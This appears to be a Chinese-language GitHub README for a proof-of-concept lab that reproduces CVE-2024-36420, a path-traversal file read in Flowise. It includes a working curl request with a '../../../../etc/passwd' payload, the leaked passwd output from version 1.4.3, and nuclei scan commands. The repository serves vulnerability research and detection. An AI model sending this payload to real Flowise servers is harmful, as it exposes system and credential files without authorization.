fineman999/POC_CVE-2024-36420

# POC_CVE-2024-36420 概念验证 用于复现影响Flowise的`CVE-2024-36420`漏洞的本地实验环境及nuclei模板草案。 ## 摘要 `CVE-2024-36420`是Flowise中由于在以下接口中未经过滤地使用`fileName`请求体参数而导致的任意文件读取漏洞： - `POST /api/v1/openai-assistants-file` 本实验环境用于验证： - 在`flowiseai/flowise:1.4.3`版本上存在漏洞行为 - 在较新的`flowiseai/flowise:3.1.2`版本上漏洞已被拒绝 ## 参考资料 - NVD：https://nvd.nist.gov/vuln/detail/CVE-2024-36420 - GitHub安全实验室：https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/ ## 文件清单 - `docker-compose.yml` - `docker-compose.latest.yml` - `CVE-2024-36420.yaml` ## 漏洞测试 启动Flowise `1.4.3`版本： ``` docker compose down -v docker compose up -d docker compose logs --tail=100 flowise ``` 手动验证： ``` curl -i \ -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \ -H 'Content-Type: application/json' \ -d '{"fileName":"../../../../etc/passwd"}' ``` 观察到的漏洞响应： ``` HTTP/1.1 200 OK Content-Disposition: attachment; filename=passwd ... root:x:0:0:root:/root:/bin/ash daemon:x:2:2:daemon:/sbin:/sbin/nologin ... ``` ## 新版控制测试 启动较新的Flowise `3.1.2`版本： ``` docker compose -f docker-compose.latest.yml down -v docker compose -f docker-compose.latest.yml up -d docker compose -f docker-compose.latest.yml logs --tail=100 flowise ``` 手动验证： ``` curl -i \ -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \ -H 'Content-Type: application/json' \ -d '{"fileName":"../../../../etc/passwd"}' ``` 观察到的新版本响应： ``` HTTP/1.1 401 Unauthorized {"error":"Unauthorized Access"} ``` ## Nuclei模板验证 验证模板： ``` nuclei -duc -validate -t CVE-2024-36420.yaml ``` 针对漏洞目标运行： ``` nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml ``` 预期行为： - `1.4.3`版本：匹配成功 - `3.1.2`版本：匹配失败 ## 备注 - 版本间隔在可接受范围内，因为本仓库仅声明已观察到的行为： - 在`1.4.3`版本存在漏洞 - 在`3.1.2`版本漏洞被拒绝 - 未声明确切的补丁版本边界。 - 未使用任何真实目标进行测试。

标签：API安全, CISA项目, CVE-2024-36420, Docker, Flowise, HTTP工具, JSON输出, Nuclei模板, POC, Web安全, 任意文件读取, 安全扫描, 安全测试, 安全防御评估, 情报收集, 攻击性安全, 文件包含漏洞, 时序注入, 概念验证, 漏洞复现, 漏洞研究, 网络安全, 网络安全审计, 蓝队分析, 请求拦截, 路径遍历, 隐私保护